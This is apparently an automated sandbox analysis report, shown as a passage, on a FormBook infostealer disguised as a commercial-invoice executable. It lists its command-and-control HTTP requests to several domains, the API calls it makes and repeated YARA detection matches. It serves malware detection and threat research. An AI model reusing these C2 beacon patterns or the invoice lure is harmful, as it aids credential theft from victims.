20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Jan 2022 09:22:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 162X-Sorting-Hat-ShopId: 59837907107X-Dc: gcp-europe-west1X-Request-ID: aa596adc-d6ad-4249-95ff-1ddd0936ac81X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd5cc745a4f4eda-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: commercial invoice_010202201.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: commercial invoice_010202201.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000007.00000002.944462814.0000000004FB2000.00000004.00020000.sdmpString found in binary or memory: https://www.survival-hunter.com/igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi
          Source: unknownDNS traffic detected: queries for: www.answertitles.com
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=zipQeNKESZPqCbLQlDCLj4zpqFgOpmaVmA6du1Oyf7pRL9Y+oEdiiyDWqjEEpcoXahJo&2dyD8R=k0GL HTTP/1.1Host: www.answertitles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL HTTP/1.1Host: www.friendschance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GL HTTP/1.1Host: www.sfcshavedice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=pt5DjHHXKdbYY+ulYudT7OdutHPMSBHvoYqZ/+0K/RDZ4aBmJwtpu5HKuc6CLarugF7n&2dyD8R=k0GL HTTP/1.1Host: www.rxvendorpills.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=P7cOGMhGan+iOds35nuUwcQL6AiWu3hpp80V2Eae8ndsAihNyn6owzlv0a79YI8S4Mj0&2dyD8R=k0GL HTTP/1.1Host: www.ludowinners.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=fxfNgp9ZS8bh2/dcez9r/a5fPpTZli2HVK4HIQKX3jCJ31NosuhFm2CAaUmyjrkPXZG7&2dyD8R=k0GL HTTP/1.1Host: www.stardomfrokch.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn&2dyD8R=k0GL HTTP/1.1Host: www.toposales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igwa/?JXRL2Htp=XkWoyKtjfo1nTXOdSlOCxSRnTVDbDlQTsKZVtKCHx1ue89AIkDfi+mwVckT9NwCZj6NC&2dyD8R=k0GL HTTP/1.1Host: www.survival-hunter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: commercial invoice_010202201.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: commercial invoice_010202201.exeStatic file information: Suspicious name
          Source: commercial invoice_010202201.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.commercial invoice_010202201.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.commercial invoice_010202201.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.commercial invoice_010202201.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.commercial invoice_010202201.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.commercial invoice_010202201.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.commercial invoice_010202201.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.commercial invoice_010202201.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.commercial invoice_010202201.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
